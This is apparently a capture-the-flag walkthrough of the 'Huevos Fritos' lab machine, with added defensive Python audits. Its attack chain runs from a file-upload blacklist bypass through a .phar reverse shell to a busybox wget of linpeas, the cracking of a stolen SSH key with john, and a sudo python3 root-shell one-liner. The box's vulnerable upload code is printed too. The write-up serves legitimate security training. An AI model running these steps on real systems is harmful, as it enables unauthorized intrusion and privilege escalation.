TheHackersLabs - Huevos Fritos: detailed walkthrough (WP)
城南花已开

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.136 08:00:27:2f:68:7a (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.972 seconds (129.82 hosts/sec). 4 responded
export ip=192.168.60.136
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.136:22
Open 192.168.60.136:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 17:49 CST
Initiating ARP Ping Scan at 17:49
Scanning 192.168.60.136 [1 port]
Completed ARP Ping Scan at 17:49, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:49
Completed Parallel DNS resolution of 1 host. at 17:49, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:49
Scanning 192.168.60.136 [2 ports]
Discovered open port 22/tcp on 192.168.60.136
Discovered open port 80/tcp on 192.168.60.136
Completed SYN Stealth Scan at 17:49, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.136
Host is up, received arp-response (0.00044s latency).
Scanned at 2025-01-04 17:49:20 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:2F:68:7A (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 80 only serves the default Apache page.

File upload

A directory scan turns up one directory, squirting:

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.136
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/squirting (Status: 301) [Size: 320] [--> http://192.168.60.136/squirting/]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

Inside it there appears to be a file upload form, but it asks for a username and password.

Uploading any file without valid credentials just returns a login-failed message for the upload.

When I enter the weak password admin, the page instead reports that an error occurred.

Capturing the request, the server most likely checks the file extension.

I used Intruder to brute-force the extension, adding a payload list of extensions.

The phtm extension turned out to be accepted for upload.

But where does the uploaded file end up?

The directory scan did not reveal it either.

I tried curl against astronomy.php and found something hidden in an HTML comment:

❯ curl 192.168.60.136/squirting/astronomy.php
Na de na
…(output omitted)
<!--/pantumaca-->


Sure enough, the uploads are in pantumaca/, but the files there are served as plain text and are not executed.

I switched to a different extension wordlist:

[PayloadsAllTheThings/Upload Insecure Files/Extension PHP/extensions.lst at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload Insecure Files/Extension PHP/extensions.lst)

Files with the phar extension are executed by the server.

Start a listener on Kali:

❯ pwncat-cs -lp 4444
[18:25:31] Welcome to pwncat 🐈! __main__.py:164
[18:25:36] received connection from 192.168.60.136:57188 bind.py:84
[18:25:36] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[18:25:37] 192.168.60.136:57188: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@huevosfritos:/$

Looking at the source, it turns out the phar extension is hard-coded as an exception to the blacklist:

(remote) www-data@huevosfritos:/var$ cat www/html/squirting/astronomy.php
<?php
// Fake credentials for demonstration purposes
$usuario_valido = "admin";
$contrasena_valida = "admin";

// Directory the uploaded file is written to
$directorioObjetivo = "pantumaca/";

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Read the submitted username and password
    $usuario = $_POST['username'];
    $contrasena = $_POST['password'];

    // Validate the login credentials
    if ($usuario === $usuario_valido && $contrasena === $contrasena_valida) {
        // Check whether a file was uploaded
        if (isset($_FILES['archivoSubido']) && $_FILES['archivoSubido']['error'] == 0) {
            $archivoObjetivo = $directorioObjetivo . basename($_FILES["archivoSubido"]["name"]);
            $subidaOk = 1;
            $tipoArchivo = strtolower(pathinfo($archivoObjetivo, PATHINFO_EXTENSION));

            // Check the file extension against a blacklist
            $extensionesNoPermitidas = array("php", "php3", "php4", "php5", "php", "phtml", "exe", "dll", "js", "html", "htm", "cgi", "pl", "py", "rb", "sh", "bat", "cmd", "com", "vbs", "vbe", "jse", "wsf", "wsh", "scr", "mhtml", "mht", "jar", "class", "war", "ear", "asp", "aspx", "cer", "csr", "jsp", "jspx", "jhtml");

            // "phar" is explicitly exempted from the blacklist here
            if (in_array($tipoArchivo, $extensionesNoPermitidas) && $tipoArchivo != "phar") {
                echo "Ha ocurrido un error: Tipo de archivo no permitido.";
                $subidaOk = 0;
            }

            // Try to move the uploaded file into the target directory
            if ($subidaOk == 1 && move_uploaded_file($_FILES["archivoSubido"]["tmp_name"], $archivoObjetivo)) {
                echo "Lo que hayas ponio " . htmlspecialchars(basename($_FILES["archivoSubido"]["name"])) . " za zubio.";
            } else {
                echo "Prohibio, directo al /404/pionono";
            }
        } else {
            echo "Canela, pero no has subio na kompare";
        }
    } else {
        echo "Algo a fallao zeguro, pero zeguro zeguro";
    }
} else {
    echo "Na de na";
}
?>
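To make the filter's gap concrete, here is an added Python model of the two checks an upload has to pass on this box. It is not the write-up's code nor the machine's PHP: it reimplements the blacklist above and adds the second check the write-up observed indirectly, namely whether the web server executes the stored file (phtm uploads were served as text, phar ran). The Apache handler pattern is an assumption, taken from Debian's stock libapache2-mod-php configuration; the write-up never shows the server config. The candidate filenames are constructed.

```python
import re

# Blacklist copied from the target's astronomy.php shown above (the duplicate "php"
# in the original array is harmless and collapses here because this is a set).
BLOCKED_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "exe", "dll", "js", "html", "htm",
    "cgi", "pl", "py", "rb", "sh", "bat", "cmd", "com", "vbs", "vbe", "jse",
    "wsf", "wsh", "scr", "mhtml", "mht", "jar", "class", "war", "ear", "asp",
    "aspx", "cer", "csr", "jsp", "jspx", "jhtml",
}

# Assumption: the box uses Debian's stock mod-php handler, whose FilesMatch
# pattern is ".+\.ph(ar|p|tml)$" (case-sensitive). This single pattern explains
# both observations in the write-up: .phar is executed, .phtm is served as text.
PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")


def extension(filename: str) -> str:
    """Mirror strtolower(pathinfo(basename($f), PATHINFO_EXTENSION)) from the PHP."""
    base = filename.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def legacy_filter_accepts(filename: str) -> bool:
    """The original check rejects only when in_array(ext, blacklist) AND ext != 'phar'."""
    ext = extension(filename)
    return not (ext in BLOCKED_EXTENSIONS and ext != "phar")


def handler_executes(filename: str) -> bool:
    """Would Apache hand this file to the PHP engine instead of serving it as text?"""
    return PHP_HANDLER.match(filename) is not None


def filter_gaps(candidates):
    """Extensions that pass the upload filter AND would be executed: the real exposure.

    Extensions that merely slip past the blacklist (pht, inc, phtm) are noise if the
    server never executes them; the audit question is the intersection of both checks.
    """
    return sorted({extension(c) for c in candidates
                   if legacy_filter_accepts(c) and handler_executes(c)})


# Hardened replacement: an allowlist of inert types, plus an unconditional refusal of
# anything the server would execute, so a later handler change cannot reopen the hole.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}


def allowlist_accepts(filename: str) -> bool:
    ext = extension(filename)
    return ext in ALLOWED_EXTENSIONS and not handler_executes(filename)


# Constructed candidate names in the style of the extensions.lst wordlist used above.
CANDIDATES = ["upload.php", "upload.php5", "upload.phtml", "upload.phtm",
              "upload.pht", "upload.phar", "upload.inc", "notes.txt", "cat.png"]

if __name__ == "__main__":
    for name in CANDIDATES:
        print(f"{name:14} filter={'pass' if legacy_filter_accepts(name) else 'block'} "
              f"executed={'yes' if handler_executes(name) else 'no'}")
    print("gaps:", filter_gaps(CANDIDATES))
```

Running it reports exactly one gap, phar, which is the write-up's result. In a real fix the allowlist check would be paired with a server-generated random filename and a storage directory outside the web root, so that even a mis-classified file is never reachable as a URL.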

User privilege escalation

The target has no nc, wget or curl, but fortunately it has busybox.

I transferred linpeas.sh and ran it:

(remote) www-data@huevosfritos:/tmp$ busybox wget 192.168.60.100/linpeas.sh
Connecting to 192.168.60.100 (192.168.60.100:80)
saving to 'linpeas.sh'
linpeas.sh 100% |******************************************************************************************************| 808k 0:00:00 ETA
'linpeas.sh' saved
(remote) www-data@huevosfritos:/tmp$ ls
linpeas.sh
(remote) www-data@huevosfritos:/tmp$ chmod +x linpeas.sh
(remote) www-data@huevosfritos:/tmp$ ./linpeas.sh
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Jan 4 11:10 /var/backups
total 24
-rw-r--r-- 1 root root 16063 Jun 16 2024 apt.extended_states.0
-rw-r--r-- 1 root root 851 Jun 16 2024 apt.extended_states.1.gz
-rw-r--r-- 1 root root 792 Jun 15 2024 apt.extended_states.2.gz

There is a backup folder, and it contains a hidden private key file:

(remote) www-data@huevosfritos:/tmp$ cd /var/backups/
(remote) www-data@huevosfritos:/var/backups$ ls
apt.extended_states.0 apt.extended_states.1.gz apt.extended_states.2.gz
(remote) www-data@huevosfritos:/var/backups$ ls -al
total 36
drwxr-xr-x 2 root root 4096 Jan 4 11:10 .
drwxr-xr-x 12 root root 4096 Jun 15 2024 ..
-rw-r--r-- 1 root root 3434 Jun 16 2024 .cositas
-rw-r--r-- 1 root root 16063 Jun 16 2024 apt.extended_states.0
-rw-r--r-- 1 root root 851 Jun 16 2024 apt.extended_states.1.gz
-rw-r--r-- 1 root root 792 Jun 15 2024 apt.extended_states.2.gz
(remote) www-data@huevosfritos:/var/backups$ cat .cositas
-----BEGIN OPENSSH PRIVATE KEY-----
[key material omitted]
-----END OPENSSH PRIVATE KEY-----

Use this private key to log in as the regular user huevosfritos.

The private key is passphrase-protected, so crack it:

❯ vim id_rsa
❯ ssh huevosfritos@192.168.60.136 -i id_rsa
The authenticity of host '192.168.60.136 (192.168.60.136)' can't be established.
ED25519 key fingerprint is SHA256:4PP67IdqfoXBE/oWAjr7t43VLjDO5bF2feCaWgBbzuw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.136' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':

❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
honda1 (id_rsa)
1g 0:00:01:19 DONE (2025-01-04 18:44) 0.01250g/s 44.41p/s 44.41c/s 44.41C/s cougar..01234
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
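As an added defensive example (not part of the write-up), the following Python script shows how a routine host audit could have caught both issues behind this step: a private key lying outside ~/.ssh with world-readable permissions, and whether that key is passphrase-protected at all. It reads the cipher and KDF names from the openssh-key-v1 header, which is the same information ssh2john extracts to decide what to crack. The sample keys are constructed headers with filler bodies, not usable keys; the file name .cositas and the /var/backups location are taken from the write-up.

```python
import base64
import os
import stat
import struct
import tempfile

PEM_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_END = "-----END OPENSSH PRIVATE KEY-----"
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(payload: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string (uint32 big-endian length prefix)."""
    return struct.pack(">I", len(payload)) + payload


def _read_ssh_string(blob: bytes, offset: int):
    """Decode one SSH wire-format string at offset; return (value, next_offset)."""
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    offset += 4
    return blob[offset:offset + length], offset + length


def inspect_openssh_key(text: str):
    """Return (ciphername, kdfname) from an OpenSSH private key, or None if it is not one.

    In openssh-key-v1 the first two fields after the magic are the cipher and KDF
    names: an unencrypted key carries "none"/"none", a passphrase-protected one
    typically "aes256-ctr"/"bcrypt" (the "Bcrypt/AES" cost john reported above).
    """
    lines = [line.strip() for line in text.splitlines()]
    if PEM_BEGIN not in lines or PEM_END not in lines:
        return None
    body = "".join(lines[lines.index(PEM_BEGIN) + 1:lines.index(PEM_END)])
    try:
        blob = base64.b64decode(body, validate=True)
    except ValueError:
        return None
    if not blob.startswith(OPENSSH_MAGIC):
        return None
    cipher, offset = _read_ssh_string(blob, len(OPENSSH_MAGIC))
    kdf, _ = _read_ssh_string(blob, offset)
    return cipher.decode("ascii"), kdf.decode("ascii")


def scan_for_private_keys(root: str):
    """Walk root and report every OpenSSH private key with its exposure status."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    content = fh.read(65536)  # keys are small; cap the read
            except OSError:
                continue  # unreadable or vanished; skip it
            if PEM_BEGIN not in content:
                continue
            header = inspect_openssh_key(content)
            mode = stat.S_IMODE(os.stat(path).st_mode)
            findings.append({
                "path": path,
                "hidden": name.startswith("."),
                "world_readable": bool(mode & stat.S_IROTH),
                "encrypted": header is not None and header[0] != "none",
                "kdf": header[1] if header else "unknown",
            })
    return findings


def make_sample_key(cipher: str, kdf: str) -> str:
    """Constructed sample: a valid openssh-key-v1 header followed by filler, not a real key."""
    blob = (OPENSSH_MAGIC
            + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
            + _ssh_string(b"\x00" * 24)      # kdfoptions (filler)
            + struct.pack(">I", 1)           # number of keys
            + _ssh_string(b"\x00" * 32)      # public key (filler)
            + _ssh_string(b"\x00" * 64))     # private section (filler)
    b64 = base64.b64encode(blob).decode("ascii")
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"{PEM_BEGIN}\n{wrapped}\n{PEM_END}\n"


def demo():
    """Recreate the write-up's finding in a temp dir: a hidden, world-readable,
    passphrase-protected key in a backup folder next to a properly restricted one."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        backups = os.path.join(root, "var", "backups")
        os.makedirs(backups)
        exposed = os.path.join(backups, ".cositas")  # name and location from the write-up
        with open(exposed, "w") as fh:
            fh.write(make_sample_key("aes256-ctr", "bcrypt"))
        os.chmod(exposed, 0o644)                      # -rw-r--r--, as on the target
        ssh_dir = os.path.join(root, "home", "user", ".ssh")
        os.makedirs(ssh_dir)
        private = os.path.join(ssh_dir, "id_ed25519")
        with open(private, "w") as fh:
            fh.write(make_sample_key("none", "none"))
        os.chmod(private, 0o600)
        for finding in scan_for_private_keys(root):
            results[os.path.basename(finding["path"])] = finding
    return results


if __name__ == "__main__":
    for name, info in demo().items():
        print(f"{name}: kdf={info['kdf']} world_readable={info['world_readable']} "
              f"encrypted={info['encrypted']}")
```

The passphrase only bought the owner of .cositas about 80 seconds against rockyou, so the scanner treats "encrypted" as informational and the 0644 mode on a key outside ~/.ssh as the finding to act on.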

Root privilege escalation

Log in again with the cracked passphrase:

❯ ssh huevosfritos@192.168.60.136 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux huevosfritos 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 16 12:24:42 2024 from 192.168.18.19
huevosfritos@huevosfritos:~$ ls
user.txt
huevosfritos@huevosfritos:~$ cat user.txt
ff954f7445b367745826282059d2c3da -

The user has sudo rights on python3, which is enough to escalate directly:

huevosfritos@huevosfritos:~$ sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
f3e431cd1129e9879e482fcb2cc151e8 -
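The last step works because a sudo rule granting an interpreter is equivalent to granting a root shell. The write-up does not print the sudoers entry itself, so the following added Python audit (not from the write-up) parses a constructed sudoers fragment, one line of which is my assumption of what the rule on this box looks like, and flags every non-root rule whose command is a shell, an interpreter or ALL. The same parser can be pointed at a real /etc/sudoers or /etc/sudoers.d/ fragment.

```python
import os
import shlex

# Constructed sample. The huevosfritos line is an assumption modelled on the
# "sudo /usr/bin/python3" command that worked in the write-up.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
huevosfritos ALL=(root) NOPASSWD: /usr/bin/python3
backup  ALL=(root) /usr/bin/rsync, /bin/tar
"""

# Programs that execute arbitrary code or spawn a shell when run as root.
INTERPRETERS_AND_SHELLS = {
    "sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl",
    "ruby", "php", "node", "lua", "vi", "vim", "less", "more", "env", "find",
}


def parse_sudoers(text: str):
    """Parse user specifications:  user host=(runas) [TAG:]... cmd[, cmd...]."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        user, rest = line.split(None, 1)
        host, spec = rest.split("=", 1)
        spec = spec.strip()
        runas = "root"                             # sudo's default Runas
        if spec.startswith("("):
            runas, spec = spec[1:].split(")", 1)
            spec = spec.strip()
        tags = set()                               # NOPASSWD:, SETENV:, ...
        while ":" in spec and spec.split(":", 1)[0].strip().isupper():
            tag, spec = spec.split(":", 1)
            tags.add(tag.strip())
            spec = spec.strip()
        commands = [c.strip() for c in spec.split(",") if c.strip()]
        rules.append({"user": user, "host": host.strip(), "runas": runas,
                      "nopasswd": "NOPASSWD" in tags, "commands": commands})
    return rules


def risky_rules(rules):
    """Return (user, command, nopasswd) for rules equivalent to a root shell."""
    flagged = []
    for rule in rules:
        if rule["user"] == "root":
            continue
        for cmd in rule["commands"]:
            program = "ALL" if cmd == "ALL" else os.path.basename(shlex.split(cmd)[0])
            if program == "ALL" or program in INTERPRETERS_AND_SHELLS:
                flagged.append((rule["user"], cmd, rule["nopasswd"]))
    return flagged


if __name__ == "__main__":
    for user, cmd, nopasswd in risky_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{user}: {cmd}{' (NOPASSWD)' if nopasswd else ''} grants root")
```

The fix is to remove the interpreter rule or replace it with a rule for the specific script the user actually needs, with an absolute path and no write access to that script for the user.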